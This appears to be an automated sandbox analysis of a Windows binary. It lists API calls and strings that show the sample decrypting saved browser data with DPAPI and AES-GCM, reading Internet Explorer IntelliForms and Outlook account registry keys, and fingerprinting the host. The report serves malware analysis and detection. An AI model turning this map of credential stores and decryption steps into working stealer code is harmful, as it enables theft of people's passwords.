GetProcAddress.KERNEL32(?,?), ref: 0040CF61
GetProcAddress.KERNEL32(?,?), ref: 0040CF9B
GetProcAddress.KERNEL32(?,?), ref: 0040CFCE
GetProcAddress.KERNEL32(?,?), ref: 0040CFFD
GetProcAddress.KERNEL32(?,?), ref: 0040D03D

Part of subcall function 004112A9: __EH_prolog.LIBCMT ref: 004112AE

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

wsprintfA.USER32 ref: 0040D0B7

Part of subcall function 00434CBE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434D0A

Part of subcall function 0043481D: __EH_prolog.LIBCMT ref: 00434822
Part of subcall function 0043481D: _strcat.LIBCMT ref: 0043487D

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Part of subcall function 0043489D: __EH_prolog.LIBCMT ref: 004348A2

LocalFree.KERNEL32(?,?,?), ref: 0040D76D
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040D70A

Part of subcall function 0040B7E1: __EH_prolog.LIBCMT ref: 0040B7E6
Part of subcall function 0040B7E1: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040B84F
Part of subcall function 0040B7E1: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040B86D
Part of subcall function 0040B7E1: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040B88E
Part of subcall function 0040B7E1: LocalAlloc.KERNEL32(00000040,?), ref: 0040B8DF
Part of subcall function 0040B7E1: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040B907

Strings

/\^C, xrefs: 0040D006
L, xrefs: 0040CF44
JHE, xrefs: 0040D42D
Opera, xrefs: 0040D3B3
<OMP, xrefs: 0040CF2D
J, xrefs: 0040D1C2
v10, xrefs: 0040D320
cOHY, xrefs: 0040CF3D
\J, xrefs: 0040D01D
"},, xrefs: 0040D603
$`\JP, xrefs: 0040D4EF, 0040D3FB
)ueF, xrefs: 0040D426
z]H], xrefs: 0040D436

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$CryptH_prolog$DeallocateLocal$AlgorithmAllocDataDecryptEnvironmentFreeGenerateOpenPropertyProviderSymmetricUnprotectVariable_strcatwsprintf
String ID: $`\JP$"},$)ueF$/\^C$<OMP$J$JHE$L$Opera$\J$cOHY$v10$z]H]
API String ID: 3336088669-1195560172
Opcode ID: bf1351af956581471289b18980538d3b20237fbac48614ef24901cbcc7359f78
Instruction ID: 8919a22c3e36951cd1e43ec398adaa01bbc061d4a375efcd9ead49950a7b58bb
Opcode Fuzzy Hash: bf1351af956581471289b18980538d3b20237fbac48614ef24901cbcc7359f78
Instruction Fuzzy Hash: 9B628F30D00258DBCF14EFA5D991BDDBBB5AF18304F1084AEE419B7292EB745A88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004368D6, Relevance: 34.4, APIs: 13, Strings: 6, Instructions: 1182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004368DB

Part of subcall function 00436478: __EH_prolog.LIBCMT ref: 0043647D
Part of subcall function 00436478: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0043651D
Part of subcall function 00436478: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 0043656B
Part of subcall function 00436478: RegCloseKey.ADVAPI32(?), ref: 00436574

_strftime.LIBCMT ref: 00436A0E
GetUserDefaultLCID.KERNEL32(00001001,?,00000100), ref: 00436A37
GetLocaleInfoA.KERNEL32(00000000), ref: 00436A3E
GetUserNameA.ADVAPI32(?,?), ref: 00436C79
GetComputerNameA.KERNEL32(?,00000101), ref: 0043730D
GetUserNameA.ADVAPI32(?,00000101), ref: 00437382
GetSystemInfo.KERNEL32(?,?,?,?,?,00000001), ref: 004376A1
GlobalMemoryStatusEx.KERNEL32(?,?,?,00000001), ref: 00437791
GetSystemMetrics.USER32 ref: 0043792D
GetSystemMetrics.USER32 ref: 0043795A
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 004379E6
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 00437A40

Strings

2, xrefs: 0043722E
7, xrefs: 00436F3D
eL4nZ5eH2n, xrefs: 00436A51
@, xrefs: 00437786
<, xrefs: 004371F6
Fri Aug 13 16:25:26 2021, xrefs: 00436AD2

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameSystemUser$DevicesDisplayEnumH_prologInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
String ID: 2$7$<$@$Fri Aug 13 16:25:26 2021$eL4nZ5eH2n
API String ID: 3320815372-2698886301
Opcode ID: 46e99c0dc303470a2c7bbb7ecf5a9aa33785357a0aa771315361501a15d6a76b
Instruction ID: 617fd19a98372bf562010c70147c9275beac3edbaa214dff02205f484119a23c
Opcode Fuzzy Hash: 46e99c0dc303470a2c7bbb7ecf5a9aa33785357a0aa771315361501a15d6a76b
Instruction Fuzzy Hash: 12B2E530E042A88BDF21DB74C9917DDBBB1AF56304F1495EED4897B246DA380F89CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0040C787, Relevance: 28.5, APIs: 10, Strings: 6, Instructions: 495libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C78C
GetProcAddress.KERNEL32(?,?), ref: 0040C7D5
GetProcAddress.KERNEL32(?,?), ref: 0040C805
GetProcAddress.KERNEL32(?,73766B69), ref: 0040C843
GetProcAddress.KERNEL32(?,?), ref: 0040C87D
GetProcAddress.KERNEL32(?,?), ref: 0040C8B0
GetProcAddress.KERNEL32(?,?), ref: 0040C8DF
GetProcAddress.KERNEL32(?,?), ref: 0040C91F
wsprintfA.USER32 ref: 0040C983

Strings

ikvs, xrefs: 0040C814
xn, xrefs: 0040C8FF
a{, xrefs: 0040CD2D
Thgd, xrefs: 0040C8F8
x6-5:=*BX, xrefs: 0040CC64
b, xrefs: 0040CCDA

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID: Thgd$a{$b$ikvs$x6-5:=*BX$xn
API String ID: 3606448584-2024134367
Opcode ID: 87e8543946d66d0915a5addd0def5a57c87062a6c5fb7273dc97513483574b23
Instruction ID: c38a063a30d734d04d6b79c5d801d7ebffdbd05eb391b8ddee93e6750816d54e
Opcode Fuzzy Hash: 87e8543946d66d0915a5addd0def5a57c87062a6c5fb7273dc97513483574b23
Instruction Fuzzy Hash: 2B22F130D04288DFDF01DFA8D9916EEBBB1EF59304F1081AEE445B7252DB741A89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00429094, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 004290B9
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 004290DA
lstrlenW.KERNEL32 ref: 004290E9
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 004290FC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,00000000), ref: 0042911F
wsprintfW.USER32 ref: 0042915B
lstrcatW.KERNEL32(00000000,?), ref: 00429169
wsprintfW.USER32 ref: 00429189
lstrcatW.KERNEL32(00000000,?), ref: 00429197
CryptDestroyHash.ADVAPI32(?,?,00000000,00000000), ref: 004291A0
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004291AB
lstrlenW.KERNEL32 ref: 004291F2
CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000001,?), ref: 00429215
LocalFree.KERNEL32(00000000), ref: 0042924E

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 004291C5
%02X, xrefs: 00429155, 00429183

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: d41f03da5838a14a581669506e7b317ab7edb80fea9c2e8841cf20ba9104e534
Instruction ID: 3a8bf6d4c04c3be4e2a3e59cd981c456e6dff5bbf6e0cb4edc504c9b715a5dd3
Opcode Fuzzy Hash: d41f03da5838a14a581669506e7b317ab7edb80fea9c2e8841cf20ba9104e534
Instruction Fuzzy Hash: B65130B1A00219AFEB119BA5DC49FFF77BCEF44340F54406AE505E2251EA789A048B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE40, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 404timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041E109: SetFilePointer.KERNEL32(?,?,00000000,?), ref: 0041E13C

_strcat.LIBCMT ref: 0041EFB3
_strcat.LIBCMT ref: 0041F02E
SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 0041F183
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041F1A3

Strings

/..\, xrefs: 0041F015
\../, xrefs: 0041EFF3
\..\, xrefs: 0041EFDD
/../, xrefs: 0041F004

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileTime$_strcat$LocalPointerSystem
String ID: /../$/..\$\../$\..\
API String ID: 3418985325-3885502717
Opcode ID: a7dbf9bdbed576c694b29cf379c2f5e92d79b23364f6fc3bf095fe1b4bef1dcf
Instruction ID: 03b3fe890a5b85a4eb20f39d646f4a7c1fb5cbf2b8bae3f8c2fd50b947437741
Opcode Fuzzy Hash: a7dbf9bdbed576c694b29cf379c2f5e92d79b23364f6fc3bf095fe1b4bef1dcf
Instruction Fuzzy Hash: B3E104755087419BD315CF25C4806EBBBE0AF89314F184A2FF8A9C7342D739D986CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00434042, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 201stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004340FD
lstrlenW.KERNEL32(00000010), ref: 00434107
lstrlenA.KERNEL32(?), ref: 00434144
lstrlenA.KERNEL32(?), ref: 0043417B
lstrlenA.KERNEL32(?), ref: 004341BF

Part of subcall function 00434B2C: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00428D4C,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00434B51
Part of subcall function 00434B2C: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00428D4C,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00434B78

lstrlenW.KERNEL32(00000000), ref: 00434205

Part of subcall function 00434A6F: lstrlenA.KERNEL32(?,?,751469A0,?,?), ref: 00434AA0
Part of subcall function 00434A6F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,?), ref: 00434ABF
Part of subcall function 00434A6F: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,?), ref: 00434AE2
Part of subcall function 00434A6F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0), ref: 00434B0E

lstrlenA.KERNEL32(00007A52), ref: 0043423F

Strings

Rz, xrefs: 00434246
Rz, xrefs: 00434219

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiWidelstrcpy$wsprintf
String ID: Rz$Rz
API String ID: 130686893-2271896198
Opcode ID: aa6934d7c40bcdb1bcfd9b39c1f1d2c8fa493484ab28b5a0140cca9475fc338f
Instruction ID: b6e1d3bd49627384b82861552a03f690a75920c8a84af05146c7f0a023a879cc
Opcode Fuzzy Hash: aa6934d7c40bcdb1bcfd9b39c1f1d2c8fa493484ab28b5a0140cca9475fc338f
Instruction Fuzzy Hash: 888139308082C89ADF05DFB8D854AEEFFF1AF5D300F14909EF4856B252D6385685CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043497C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 004349C4
RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 004349E3
RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00434A1E
RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 00434A3F

Part of subcall function 00444AF5: _free.LIBCMT ref: 00444B08

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 004349C2

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$CloseOpen_free
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 3744367872-680441574
Opcode ID: 2f6c635f10d7602c3bcad4f7c51e55765e59af737921485f0e4164cfab681f5b
Instruction ID: bd036fce1dd2d4eb1965866bdff209f6701f3b09e41fc4fb95c44c9e39ee67e7
Opcode Fuzzy Hash: 2f6c635f10d7602c3bcad4f7c51e55765e59af737921485f0e4164cfab681f5b
Instruction Fuzzy Hash: F5316F72640209BBEF20DE94DC81BEF7768EF88754F104126FC04AA250E739ED148B69

Uniqueness

Uniqueness Score: -1.00%

Function 00436478, Relevance: 6.4, APIs: 4, Instructions: 354registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043647D
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0043651D
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 0043656B
RegCloseKey.ADVAPI32(?), ref: 00436574

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID:
API String ID: 2130659939-0
Opcode ID: 78d8b73fc61b0411ba5b04ec280d123ce47b03b7542ce2cc62baad082d822f12
Instruction ID: 117110e85434c23fffd41b93938fbadf77b694ad2154d8e334ba6e56de8ac586
Opcode Fuzzy Hash: 78d8b73fc61b0411ba5b04ec280d123ce47b03b7542ce2cc62baad082d822f12
Instruction Fuzzy Hash: CDD12770D05249AEEF15DFA8C8917EEBBB8EF18304F10916FD456B3282D7780A48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00420010, Relevance: 4.6, APIs: 3, Instructions: 144encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00420015
_strlen.LIBCMT ref: 00420084
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0042008C

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: BinaryCryptH_prologString_strlen
String ID:
API String ID: 2573900957-0
Opcode ID: 4656c06fa62e8b887f8b7190f5b97b25c704b0a6b4723e903da84afab731c75e
Instruction ID: b0281fa12a2e89ed966571ba5558e5defbbb2b459b9d8dd209c12800461c1f68
Opcode Fuzzy Hash: 4656c06fa62e8b887f8b7190f5b97b25c704b0a6b4723e903da84afab731c75e
Instruction Fuzzy Hash: 0B5106B4E00259AFDF15CFA9AC905FEFBB9EF05344F40006EE405A7242DB388A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004362A8, Relevance: 4.6, APIs: 3, Instructions: 102timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004362AD
GetTimeZoneInformation.KERNEL32(?), ref: 004362CA

Part of subcall function 0041223F: __EH_prolog.LIBCMT ref: 00412244

Part of subcall function 00412950: __EH_prolog.LIBCMT ref: 00412955
Part of subcall function 00412950: std::locale::_Init.LIBCPMT ref: 00412973

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043641C

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID:
API String ID: 3259846166-0
Opcode ID: 3516c6e79a5f0b84660cbac79e9dd82bbbe1bba86d38d2df9d9b8c9204cbab77
Instruction ID: a90b8c0b26654543329729ff7cd043f31d6dea600e7062c27a74e404112ec257
Opcode Fuzzy Hash: 3516c6e79a5f0b84660cbac79e9dd82bbbe1bba86d38d2df9d9b8c9204cbab77
Instruction Fuzzy Hash: 62419AB0D003589BDB11DFA9C9857EEBBB5AF48304F1081AED808B7241EB781A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00434D4F, Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00434D54
GetLogicalDriveStringsA.KERNEL32 ref: 00434DA1

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateDriveH_prologLogicalStrings
String ID:
API String ID: 3000204024-0
Opcode ID: e9e3461f2dea40b18a2b6350068233eb19ab3ccc3a3bb2fc57676045033a0935
Instruction ID: 71f45e965023721a035a6558a4c710b55625fcd4d08e9640a175792bd5fb4bbf
Opcode Fuzzy Hash: e9e3461f2dea40b18a2b6350068233eb19ab3ccc3a3bb2fc57676045033a0935
Instruction Fuzzy Hash: 4221ACB1D02245AFDB00EFA9C4417EEFBF5AF58308F14406EE444B3282D7B85A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0045EACD, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1633ed9607c61af5aec48e797554fcdb7c834024b0f940994e345302ad828487
Instruction ID: cb3b058660d2253719816dee6b0b91ab89c351e4cd7cc8f21814135663604db3
Opcode Fuzzy Hash: 1633ed9607c61af5aec48e797554fcdb7c834024b0f940994e345302ad828487
Instruction Fuzzy Hash: C241C67580421CAFDB14DF6ACC89AAEBBB9EB45305F1442DEE81DD3202D6349E848F14

Uniqueness

Uniqueness Score: -1.00%

Function 0043458A, Relevance: 1.6, APIs: 1, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0046CBC0,00000000,00000001,0046CB90,?), ref: 004345AD

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: d2cf5542a9d8ffeff3d3e9bfd9ea1601a56d85d5fcc7a31aa8e953d1e1494426
Instruction ID: 506ba58f1158d9769a224c1fd8d04376c85edb0f246a5f5281812f059fc77c2b
Opcode Fuzzy Hash: d2cf5542a9d8ffeff3d3e9bfd9ea1601a56d85d5fcc7a31aa8e953d1e1494426
Instruction Fuzzy Hash: 08315071600219AFDB14DB99DC89EDF7BB8DF89754F10009AF508DB250EA35EE00CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00460A18, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00460A5C

Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FDD1
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FDE3
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FDF5
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE07
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE19
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE2B
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE3D
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE4F
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE61
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE73
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE85
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FE97
Part of subcall function 0045FDB4: _free.LIBCMT ref: 0045FEA9

_free.LIBCMT ref: 00460A51

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

_free.LIBCMT ref: 00460A73
_free.LIBCMT ref: 00460A88
_free.LIBCMT ref: 00460A93
_free.LIBCMT ref: 00460AB5
_free.LIBCMT ref: 00460AC8
_free.LIBCMT ref: 00460AD6
_free.LIBCMT ref: 00460AE1
_free.LIBCMT ref: 00460B19
_free.LIBCMT ref: 00460B20
_free.LIBCMT ref: 00460B3D
_free.LIBCMT ref: 00460B55

Strings

@aH, xrefs: 00460A2E

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: @aH
API String ID: 161543041-2335885206
Opcode ID: 9d6eb5354a4dcfb14655898a707652c7b66f5a564ab7fc8901f1dd163918eee9
Instruction ID: 81a76789063961c898706862cd23a40169be967ed5fb04ee08ce08586d8f420d
Opcode Fuzzy Hash: 9d6eb5354a4dcfb14655898a707652c7b66f5a564ab7fc8901f1dd163918eee9
Instruction Fuzzy Hash: 57319E316043019FDB30AABAE809B5B73E9EF50755F10842BE445C6292EB3CAD44C719

Uniqueness

Uniqueness Score: -1.00%

Function 0043439D, Relevance: 24.1, APIs: 3, Strings: 13, Instructions: 102stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00433A05: LoadLibraryA.KERNEL32(?), ref: 00433A44
Part of subcall function 00433A05: GetProcAddress.KERNEL32(00000000,?), ref: 00433A7F
Part of subcall function 00433A05: FreeLibrary.KERNEL32(00000000), ref: 00433AB3

Part of subcall function 00433E5F: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433E84
Part of subcall function 00433E5F: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433F15
Part of subcall function 00433E5F: RegCloseKey.ADVAPI32(?), ref: 00433F22

Part of subcall function 00433F2C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433F53
Part of subcall function 00433F2C: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433F7E
Part of subcall function 00433F2C: lstrlenW.KERNEL32(?), ref: 00433F95
Part of subcall function 00433F2C: lstrlenW.KERNEL32(?), ref: 00433FA2
Part of subcall function 00433F2C: lstrcpyW.KERNEL32 ref: 00433FC3
Part of subcall function 00433F2C: lstrcatW.KERNEL32(00000000,0047BC74), ref: 00433FCF
Part of subcall function 00433F2C: lstrcatW.KERNEL32(00000000,?), ref: 00433FDD
Part of subcall function 00433F2C: lstrcatW.KERNEL32(00000000,?), ref: 00433FE9
Part of subcall function 00433F2C: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 00434023
Part of subcall function 00433F2C: RegCloseKey.ADVAPI32(?), ref: 00434038

Part of subcall function 0043497C: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 004349C4
Part of subcall function 0043497C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 004349E3
Part of subcall function 0043497C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00434A1E
Part of subcall function 0043497C: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 00434A3F

lstrlenW.KERNEL32(00000000), ref: 004343FF
lstrcpyW.KERNEL32 ref: 00434417
lstrcpyW.KERNEL32 ref: 00434423

Part of subcall function 00433E5F: lstrlenW.KERNEL32(?), ref: 00433EAA
Part of subcall function 00433E5F: lstrcpyW.KERNEL32 ref: 00433EC7
Part of subcall function 00433E5F: lstrcatW.KERNEL32(00000000,0047BC74), ref: 00433ED3
Part of subcall function 00433E5F: lstrcatW.KERNEL32(00000000,?), ref: 00433EE1

Part of subcall function 00444AF5: _free.LIBCMT ref: 00444B08

Strings

Outlook, xrefs: 004343E0
Identities, xrefs: 004343D1
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00434461
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00434499
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 004344B5
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 004344C9
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 0043448B
\Accounts, xrefs: 0043441D
Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 0043447D
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 004344A7
Software\Microsoft\Internet Account Manager, xrefs: 004343E5
Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 0043446F
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 00434456

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts
API String ID: 527226083-2708568971
Opcode ID: 691ab721d64fd2b8b053b76495c0a8b7e11a5126df22a4619fe6503e5452c169
Instruction ID: 98580410122f46bc0d902c87152a135ecd5088a2cad56bbfd0f41e61827a5b79
Opcode Fuzzy Hash: 691ab721d64fd2b8b053b76495c0a8b7e11a5126df22a4619fe6503e5452c169
Instruction Fuzzy Hash: F9315A71944208FEE704FBA18CC3EEE77B8DA58748BA0405EF00562182AFB95F058A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00451116, Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00451185
_free.LIBCMT ref: 0045119B
_free.LIBCMT ref: 004511AE
_free.LIBCMT ref: 004511C3
_free.LIBCMT ref: 004511D8
GetCPInfo.KERNEL32(?,?), ref: 00451222

Part of subcall function 0045C869: _free.LIBCMT ref: 0045C8D4

_free.LIBCMT ref: 0045148D
_free.LIBCMT ref: 004514A0
_free.LIBCMT ref: 004514AE
_free.LIBCMT ref: 004514B9
